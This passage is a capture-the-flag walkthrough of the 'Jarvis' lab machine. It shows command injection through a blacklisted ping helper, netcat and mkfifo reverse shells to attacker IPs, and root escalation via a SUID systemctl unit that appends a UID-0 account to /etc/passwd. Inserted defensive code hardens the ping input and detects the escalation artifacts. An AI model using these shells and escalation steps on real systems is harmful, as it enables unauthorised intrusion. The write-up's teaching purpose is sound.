pepper 1164 0.0 0.4 19416 4472 pts/3 S Nov09 0:00 bash
pepper 1173 0.0 0.4 19416 4480 pts/3 S Nov09 0:00 bash -i
www-data 1223 0.0 1.3 271892 13236 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1232 0.0 0.0 4276 748 ? S Nov09 0:00 sh -c nc 10.10.15.41 1111 -e /bin/bash
www-data 1233 0.0 0.2 17940 2828 ? S Nov09 0:00 bash
www-data 1236 0.0 0.6 32176 6816 ? S Nov09 0:00 python -c import pty;pty.spawn("/bin/sh")
www-data 1237 0.0 0.0 4276 744 pts/4 Ss Nov09 0:00 /bin/sh
www-data 1239 0.0 0.3 28976 3264 pts/4 S+ Nov09 0:00 vi
www-data 1250 0.0 1.1 271700 11404 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1251 0.0 1.7 273848 17600 ? S Nov09 0:00 /usr/sbin/apache2 -k start
www-data 1366 0.0 0.0 4276 696 ? S Nov09 0:00 sh -c nc 10.10.15.41 1111 -e /bin/bash
www-data 1367 0.0 0.2 17940 2852 ? S Nov09 0:00 bash
www-data 1368 0.0 0.6 32176 6952 ? S Nov09 0:00 python -c import pty; pty.spawn("/bin/sh")
www-data 1369 0.0 0.0 4276 756 pts/5 Ss Nov09 0:00 /bin/sh
www-data 1370 0.0 0.3 28976 3256 pts/5 S Nov09 0:15 vi
www-data 1372 0.0 0.0 4276 760 pts/5 S Nov09 0:00 sh -c bash
www-data 1373 0.0 0.3 18168 3232 pts/5 S Nov09 0:00 bash
root 1400 0.0 0.3 47608 3240 pts/5 S+ Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1401 0.0 0.8 26044 8868 pts/5 S+ Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1402 0.0 0.0 4276 744 pts/5 S+ Nov09 0:00 sh -c ping $(/tmp/rev.sh)
pepper 1403 0.0 0.0 4276 712 pts/5 S+ Nov09 0:00 /bin/sh /tmp/rev.sh
pepper 1404 0.0 0.2 9484 2532 pts/5 S+ Nov09 0:00 bash
pepper 1406 0.0 0.6 32176 6964 pts/5 S+ Nov09 0:00 python -c import pty; pty.spawn("/bin/sh")
pepper 1407 0.0 0.0 4276 716 pts/6 Ss Nov09 0:00 /bin/sh
pepper 1408 0.0 0.3 28976 3328 pts/6 S Nov09 0:14 vi
pepper 1409 0.0 0.4 19416 4560 pts/6 S+ Nov09 0:00 bash
pepper 1416 0.0 0.6 32176 6600 pts/3 S+ Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
pepper 1417 0.0 0.4 19408 4420 pts/7 Ss+ Nov09 0:00 /bin/bash
www-data 1428 0.0 0.0 4276 712 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1432 0.0 0.0 4276 720 ? S Nov09 0:00 /bin/sh -i
www-data 1434 0.0 0.6 32176 6960 ? S Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 1435 0.0 0.3 18164 3160 pts/8 Ss Nov09 0:00 /bin/bash
www-data 1437 0.0 0.3 18164 3224 pts/8 S Nov09 0:00 bash -i
www-data 1438 0.0 0.6 32176 6772 pts/8 S+ Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 1439 0.0 0.3 18164 3308 pts/9 Ss+ Nov09 0:00 /bin/bash
www-data 1444 0.0 0.0 4276 760 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1448 0.0 0.0 4276 752 ? S Nov09 0:00 /bin/sh -i
www-data 1450 0.0 0.6 32176 6980 ? S Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 1451 0.0 0.3 18164 3144 pts/10 Ss Nov09 0:00 /bin/bash
root 1452 0.0 0.3 47608 3208 pts/10 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper 1453 0.0 0.9 26040 9156 pts/10 S Nov09 0:00 python3 /var/www/Admin-Utilities/simpler.py -p
pepper 1454 0.0 0.0 4276 792 pts/10 S Nov09 0:00 sh -c ping $(bash)
pepper 1455 0.0 0.4 19416 4432 pts/10 S Nov09 0:00 bash
pepper 1461 0.0 0.4 19416 4412 pts/10 S Nov09 0:00 bash -i
pepper 1467 0.0 0.6 32176 6788 pts/10 S+ Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
pepper 1468 0.0 0.4 19416 4460 pts/11 Ss+ Nov09 0:00 /bin/bash
www-data 1484 0.0 0.0 4276 772 ? S Nov09 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.251 1234 >/tmp/f
www-data 1488 0.0 0.0 4276 712 ? S Nov09 0:00 /bin/sh -i
www-data 1490 0.0 0.6 32176 6912 ? S Nov09 0:00 python -c import pty;pty.spawn('/bin/bash')
www-data 1491 0.0 0.3 18164 3228 pts/12 Ss Nov09 0:00 /bin/bash
root 1492 0.0 0.3 47608 3220 pts/12 S Nov09 0:00 sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
pepper

[-] Apache version:
Server version: Apache/2.4.25 (Debian)
Server built: 2018-11-03T18:46:19

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

[-] Installed Apache modules:
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
headers_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
reqtimeout_module (shared)
setenvif_module (shared)
status_module (shared)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii g++ 4:6.3.0-4 amd64 GNU C++ compiler
ii g++-6 6.3.0-18+deb9u1 amd64 GNU C++ compiler
ii gcc 4:6.3.0-4 amd64 GNU C compiler
ii gcc-6 6.3.0-18+deb9u1 amd64 GNU C compiler

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1546 Nov 9 20:02 /etc/passwd
-rw-r--r-- 1 root root 679 Mar 4 2019 /etc/group
-rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 959 Mar 5 2019 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 30800 Aug 21 2018 /bin/fusermount
-rwsr-xr-x 1 root root 44304 Mar 7 2018 /bin/mount
-rwsr-xr-x 1 root root 61240 Nov 10 2016 /bin/ping
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-rwsr-xr-x 1 root root 31720 Mar 7 2018 /bin/umount
-rwsr-xr-x 1 root root 40536 May 17 2017 /bin/su
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl
-rwsr-xr-x 1 root root 40312 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59680 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 75792 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40504 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 140944 Jun 5 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 50040 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 440728 Mar 1 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Mar 2 2018 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

[+] Possibly interesting SUID files:
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl

[-] SGID files:
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl
-rwxr-sr-x 1 root shadow 35592 May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root ssh 358624 Mar 1 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 40264 Oct 7 2017 /usr/bin/crontab
-rwxr-sr-x 1 root mail 19008 Jan 17 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 71856 May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27448 Mar 7 2018 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22808 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 14768 Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root utmp 10232 Feb 18 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter

[+] Possibly interesting SGID files:
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:37 /home/pepper/systemctl

[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 May 27 2017 /etc/pam.conf
-rw-r--r-- 1 root root 973 Jan 31 2017 /etc/mke2fs.conf
-rw-r--r-- 1 root root 2981 Mar 2 2019 /etc/adduser.conf
-rw-r--r-- 1 root root 599 May 5 2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 144 Mar 2 2019 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
-rw-r--r-- 1 root root 57 Aug 7 08:14 /etc/resolv.conf
-rw-r--r-- 1 root root 2683 May 17 2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 2969 May 21 2017 /etc/debconf.conf
-rw-r--r-- 1 root root 4781 May 15 2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 1963 Jan 18 2017 /etc/rsyslog.conf
-rw-r--r-- 1 root root 34 Mar 2 2018 /etc/ld.so.conf
-rw-r--r-- 1 root root 280 Jul 26 2018 /etc/fuse.conf
-rw-r--r-- 1 root root 191 Apr 12 2017 /etc/libaudit.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 3173 Jul 3 2018 /etc/reportbug.conf
-rw-r--r-- 1 root root 346 Feb 26 2018 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 604 Jun 26 2016 /etc/deluser.conf
-rw-r--r-- 1 root root 6790 Mar 2 2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 2584 Aug 1 2016 /etc/gai.conf
-rw-r--r-- 1 root root 497 Feb 6 2019 /etc/nsswitch.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/pepper/.bash_history

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 2 2019 .
drwxr-xr-x 12 root root 4096 Mar 2 2019 ..

### SCAN COMPLETE ####################################

www-data@jarvis:/var/www/Admin-Utilities$ sudo -u pepper ./simpler.py -p
sudo -u pepper ./simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
@ironhackers.es

***********************************************

Enter an IP: $(id)
$(id)
ping: groups=1000(pepper): Temporary failure in name resolution

root@kali:~/Downloads# stty raw -echo
root@kali:~/Downloads# nc -lvnp 8888

www-data@jarvis:/var/www/Admin-Utilities$

www-data@jarvis:/var/www/Admin-Utilities$ export TERM=screen

www-data@jarvis:/var/www/Admin-Utilities$ cd /home/

www-data@jarvis:/home$ ls
pepper

www-data@jarvis:/home$ cd pepper

www-data@jarvis:/home/pepper$ ls -al
total 208
drwxr-xr-x 4 pepper pepper 4096 Nov 10 00:37 .
drwxr-xr-x 3 root root 4096 Mar 2 2019 ..
lrwxrwxrwx 1 root root 9 Mar 4 2019 .bash_history -> /dev/null
-rw-r--r-- 1 pepper pepper 220 Mar 2 2019 .bash_logout
-rw-r--r-- 1 pepper pepper 3526 Mar 2 2019 .bashrc
drwxr-xr-x 2 pepper pepper 4096 Mar 2 2019 .nano
-rw-r--r-- 1 pepper pepper 675 Mar 2 2019 .profile
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-rw-r--r-- 1 pepper pepper 0 Nov 9 22:46 hacked
-rw-r--r-- 1 pepper pepper 122 Nov 9 22:42 hacked.service
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:37 systemctl
-r--r----- 1 root pepper 33 Mar 5 2019 user.txt

www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied

www-data@jarvis:/home/pepper$ cat user.txt
cat: user.txt: Permission denied
www-data@jarvis:/home/pepper$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
@ironhackers.es

***********************************************

********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage: python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP

www-data@jarvis:/home/pepper$ cat /var/www/Admin-Utilities/simpler.py
#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage: python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
@ironhackers.es

***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()

The most interesting function in this script is exec_ping:

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)
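The blacklist above is the whole problem: command substitution with $( ) uses none of the forbidden characters, so the input still reaches os.system() and a shell, which is why $(id) and $(bash) work later in this writeup. As an added example (not code from the writeup or from simpler.py), the original check is reproduced next to a hardened replacement that accepts only a literal IP address and hands it to ping as an argv list with no shell at all; the function names are assumed.

```python
import ipaddress
import subprocess

# The original simpler.py filter, reproduced for comparison: a blacklist of
# shell metacharacters (constructed example, not the page's own file).
FORBIDDEN = ['&', ';', '-', '`', '||', '|']


def blacklist_allows(user_input: str) -> bool:
    """Mirror exec_ping's check: True when the input would reach os.system()."""
    return not any(token in user_input for token in FORBIDDEN)


def validated_ping_argv(user_input: str, count: int = 1) -> list:
    """Hardened replacement (assumed design, not from the original script).

    Accept only a literal IPv4/IPv6 address and build an argv list for
    subprocess.run(..., shell=False), so no shell ever parses the input.
    Raises ValueError for anything that is not an address, including $(...).
    """
    text = user_input.strip()
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        raise ValueError("not an IP address: %r" % text) from None
    # str(addr) is the normalised address; the user's text never becomes shell syntax.
    return ["ping", "-c", str(count), str(addr)]


def safe_ping(user_input: str) -> int:
    """Run ping without a shell and return its exit status."""
    argv = validated_ping_argv(user_input)
    return subprocess.run(argv, check=False).returncode


if __name__ == "__main__":
    # Constructed inputs: a real address, the substitution the page uses,
    # and an input the blacklist does catch.
    for sample in ["10.10.10.143", "$(id)", "10.10.10.143 `id`"]:
        print(repr(sample), "blacklist passes:", blacklist_allows(sample))
        try:
            print("  hardened argv:", validated_ping_argv(sample))
        except ValueError as err:
            print("  hardened rejects:", err)
```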

now on another terminal

www-data@jarvis:/home/pepper$ sudo -u pepper /var/www/Admin-Utilities/simpler.py
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
@ironhackers.es

***********************************************

Enter an IP: $(bash)

pepper@jarvis:~$

pepper@jarvis:~$ id
pepper@jarvis:~$ cat user.txt
pepper@jarvis:~$ ls -la

on another terminal

root@kali:~/Downloads# nc -lvnp 1338
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338

on previous shell

pepper@jarvis:~$ nc -e /bin/bash 10.10.15.149 1338

and on the listener terminal we get the shell:

root@kali:~/Downloads# nc -lvnp 1338
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338
Ncat: Connection from 10.10.10.143.
Ncat: Connection from 10.10.10.143:38548.
python -c 'import pty; pty.spawn("/bin/bash")'
pepper@jarvis:~$

pepper@jarvis:~$ export TERM=screen

pepper@jarvis:~$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)

pepper@jarvis:~$ ls -al
total 220
drwxr-xr-x 5 pepper pepper 4096 Nov 10 02:08 .
drwxr-xr-x 3 root root 4096 Mar 2 2019 ..
lrwxrwxrwx 1 root root 9 Mar 4 2019 .bash_history -> /dev/null
-rw-r--r-- 1 pepper pepper 220 Mar 2 2019 .bash_logout
-rw-r--r-- 1 pepper pepper 3526 Mar 2 2019 .bashrc
drwxr-xr-x 3 pepper pepper 4096 Nov 10 01:13 .config
drwxr-xr-x 2 pepper pepper 4096 Mar 2 2019 .nano
-rw-r--r-- 1 pepper pepper 675 Mar 2 2019 .profile
-rw-r--r-- 1 pepper pepper 123 Nov 10 01:58 1.service
drwxr-xr-x 3 pepper pepper 4096 Mar 4 2019 Web
-rw-r--r-- 1 pepper pepper 45 Nov 10 00:50 hacked
-rw-r--r-- 1 pepper pepper 122 Nov 9 22:42 hacked.service
-rwsr-s--- 1 pepper pepper 174520 Nov 10 00:52 systemctl
-r--r----- 1 root pepper 33 Mar 5 2019 user.txt

pepper@jarvis:~$ cat user.txt
2afa36c4f05b37bXXXXXXXXXXXXXXXXXXXXXXXXXXX

pepper@jarvis:~$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/home/pepper/systemctl
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

to /etc/passwd to enable us to su as root with the credentials rooot : AAAA

pepper@jarvis:/dev/shm$ nano root.service

[Unit]
Description=pwned

[Service]
ExecStart=/dev/shm/root.sh

[Install]
WantedBy=multi-user.target

pepper@jarvis:/dev/shm$ cat root.service
[Unit]
Description=pwned

[Service]
ExecStart=/dev/shm/root.sh

[Install]
WantedBy=multi-user.target

pepper@jarvis:/dev/shm$ nano root.sh

pepper@jarvis:/dev/shm$ chmod +x root.sh

pepper@jarvis:/dev/shm$ cat root.sh

#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd

I enabled the service and started it:

pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.

pepper@jarvis:/dev/shm$ systemctl start root.service

pepper@jarvis:/dev/shm$

Now if we check /etc/passwd we’ll see that it has been modified:

pepper@jarvis:/dev/shm$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
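
As an added example from the defender's side (written here, not part of the walkthrough): the escalation above leaves three artifacts that are easy to check for, the SUID copy of systemctl sitting in a home directory, the unit symlink under /etc/systemd/system pointing into /dev/shm, and the extra UID-0 entry with an inline password hash in /etc/passwd. The samples are constructed from the listings above and the function names are hypothetical.

```python
# Constructed samples taken from the listings above, so the checks run offline.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
"""
SAMPLE_SUID = ['/bin/ping', '/bin/systemctl', '/home/pepper/systemctl', '/usr/bin/sudo']
SAMPLE_UNIT_LINKS = [
    ('/etc/systemd/system/multi-user.target.wants/root.service', '/dev/shm/root.service'),
    ('/etc/systemd/system/multi-user.target.wants/ssh.service', '/lib/systemd/system/ssh.service'),
]

# Directories where SUID binaries and systemd units are expected to live.
SYSTEM_BIN_DIRS = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/usr/libexec/')
UNIT_DIRS = ('/etc/systemd/', '/lib/systemd/', '/usr/lib/systemd/', '/run/systemd/')


def audit_passwd(text):
    """Return (user, reason) findings: UID-0 accounts other than root, and password fields not shadowed ('x')."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith('#'):
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append((line, 'malformed entry'))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == '0' and user != 'root':
            findings.append((user, 'uid 0 account other than root'))
        if pw != 'x':
            findings.append((user, 'password field not shadowed'))
    return findings


def suid_outside_system_dirs(paths):
    """From a 'find / -perm -4000' listing, return SUID binaries outside the system bin directories."""
    return [p for p in paths if not p.startswith(SYSTEM_BIN_DIRS)]


def units_outside_unit_dirs(links):
    """From (symlink, target) pairs under /etc/systemd/system, return units whose file lives in an untrusted path."""
    return [(link, target) for link, target in links if not target.startswith(UNIT_DIRS)]
```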

pepper@jarvis:/dev/shm$ su rooot
password : AAAA

root@jarvis:/dev/shm# cd /root

root@jarvis:~# ls -la

root@jarvis:~# cat root.txt
d41d8cd98f00bXXXXXXXXXXXXXXXXXXXXXXXXX

@SAKSHAM DIXIT